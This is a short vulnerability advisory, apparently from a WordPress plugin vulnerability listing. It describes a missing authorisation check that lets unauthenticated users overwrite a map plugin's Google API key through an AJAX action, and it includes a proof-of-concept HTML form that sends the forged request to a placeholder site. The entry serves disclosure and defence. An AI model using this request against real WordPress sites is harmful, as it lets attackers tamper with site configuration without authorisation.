The gmw_map_block_save_key AJAX action, available to both authenticated and unauthenticated users did not have any check in place to prevent unauthorised change of the Google API key.
<html> <body> <form action="https://example.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="gmw_map_block_save_key" /> <input type="hidden" name="api_key" value="XXXX" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Yes
2021-02-10 (about 1 years ago)
2021-02-10 (about 1 years ago)
2021-02-10 (about 1 years ago)